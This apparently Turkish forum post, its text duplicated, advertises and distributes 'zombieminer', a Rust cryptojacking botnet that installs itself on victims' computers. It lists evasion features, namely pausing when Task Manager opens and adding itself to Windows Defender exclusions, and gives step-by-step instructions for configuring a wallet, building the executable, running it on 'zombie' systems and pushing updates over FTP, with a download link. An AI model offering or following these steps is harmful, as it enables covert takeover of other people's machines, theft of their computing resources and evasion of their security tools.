- 3 Eki 2012
- 72
- 30
Nerdeyse 2 sene önce paylaştığım postu belki hatırlayan olur: Crypto Mining BOTNET: Zombi sistemlerinize kendi bitcoin'inizi kazdırın
Şimdi de eskiden C++ ve Python ile yazdığım sistemin genel olarak aynı işlevde olan ve 0'dan tamamen Rust ile yazdığım çok daha gelişmiş versiyonunu paylaşıyorum.
Çalışma prensibi:
- Kendini hedef sisteme yerleştirerek periyodik olarak kullanıcının bilgisayarı kullanma durumuna göre mining yapar.
- FTP üzerinden güncelleme alabilir.
- Kullanıcıya fark edilmemek için görev yönetcisi açıldığında miningi duraklatır. (bu ayar config dosyasından değiştirilebilir)
- CPU mining yapar ve yalnızca NiceHash pool üzerinden RandomX Monero mine'lar.
- Windows Defender'a yakalanmamak için kendi binary'sini exclusion olarak ekler.
- Sistem idle'da iken bütün cpu gücünü kullanarak, sistem kullanımda iken ise config'de belirtilmiş ayarlara göre mining yapar.
Başlamak için adımlar:
1. NiceHash - Leading Cryptocurrency Platform for Mining and Trading üzerinden nicehash hesabı açın.
2. Üye olup giriş yaptıkan sonra yukarıdan Mining sekmesine gelip Mining Address butonundan cüzdan adresinizi alın.
3. Aşağıdaki linkten zombieminr'i indirin ve config.json dosyasını düzenlemek için açın.
4. Seçeneklerin hepsinin açıklamaları config dosyasında. nicehash_address'e az önce nicehash'den aldığınız cüzdan adresinizi girin ve diğer ayarları da istenilen gibi düzenleyerek config.json'u kaydedin.
5. ui.exe'yi açıp exe buildlemek için konsola B yazıp enterlayın. miner-ready klasöründe miner-ready.exe dosyası oluşacak.
6. miner-ready.exe'yi mining yapılacak zombi sistemde açın.
Tebrikler. Bu kadardı.
* Daha sonra ben güncelleme yapıp burada paylaştığımda veya config.json'u değiştirip göndermek istediğinizde zombi sistemlere update gönderebilmek ve mininge devam edebilmek için config.json'da FTP bölümlerini doldurmalısınız. Tek kullanımlık, içinde önemli şeyler olmayan bir FTP sunucusu seçin çünkü exe boyutunu küçük tutabilmek için ssl librarylerini eklemedim, ftp bağlantısı tls üzerinden olmayacak. Ben ftp serverını ücretsiz olarak 000webhost.com'dan alıyorum.
* Drive linkinde bir de cleaner.exe bıraktım. Kendi sisteminizde açıp test etmeniz durumunda cleaner'ı açarak sistemi miner'dan temizleyebilirsiniz.
VIRUSTOTAL: VirusTotal
DRIVE DOWNLOAD: ZOMBIEMINER - Google Drive
Şimdi de eskiden C++ ve Python ile yazdığım sistemin genel olarak aynı işlevde olan ve 0'dan tamamen Rust ile yazdığım çok daha gelişmiş versiyonunu paylaşıyorum.
Çalışma prensibi:
- Kendini hedef sisteme yerleştirerek periyodik olarak kullanıcının bilgisayarı kullanma durumuna göre mining yapar.
- FTP üzerinden güncelleme alabilir.
- Kullanıcıya fark edilmemek için görev yönetcisi açıldığında miningi duraklatır. (bu ayar config dosyasından değiştirilebilir)
- CPU mining yapar ve yalnızca NiceHash pool üzerinden RandomX Monero mine'lar.
- Windows Defender'a yakalanmamak için kendi binary'sini exclusion olarak ekler.
- Sistem idle'da iken bütün cpu gücünü kullanarak, sistem kullanımda iken ise config'de belirtilmiş ayarlara göre mining yapar.
Başlamak için adımlar:
1. NiceHash - Leading Cryptocurrency Platform for Mining and Trading üzerinden nicehash hesabı açın.
2. Üye olup giriş yaptıkan sonra yukarıdan Mining sekmesine gelip Mining Address butonundan cüzdan adresinizi alın.
3. Aşağıdaki linkten zombieminr'i indirin ve config.json dosyasını düzenlemek için açın.
4. Seçeneklerin hepsinin açıklamaları config dosyasında. nicehash_address'e az önce nicehash'den aldığınız cüzdan adresinizi girin ve diğer ayarları da istenilen gibi düzenleyerek config.json'u kaydedin.
5. ui.exe'yi açıp exe buildlemek için konsola B yazıp enterlayın. miner-ready klasöründe miner-ready.exe dosyası oluşacak.
6. miner-ready.exe'yi mining yapılacak zombi sistemde açın.
Tebrikler. Bu kadardı.
* Daha sonra ben güncelleme yapıp burada paylaştığımda veya config.json'u değiştirip göndermek istediğinizde zombi sistemlere update gönderebilmek ve mininge devam edebilmek için config.json'da FTP bölümlerini doldurmalısınız. Tek kullanımlık, içinde önemli şeyler olmayan bir FTP sunucusu seçin çünkü exe boyutunu küçük tutabilmek için ssl librarylerini eklemedim, ftp bağlantısı tls üzerinden olmayacak. Ben ftp serverını ücretsiz olarak 000webhost.com'dan alıyorum.
* Drive linkinde bir de cleaner.exe bıraktım. Kendi sisteminizde açıp test etmeniz durumunda cleaner'ı açarak sistemi miner'dan temizleyebilirsiniz.
VIRUSTOTAL: VirusTotal
DRIVE DOWNLOAD: ZOMBIEMINER - Google Drive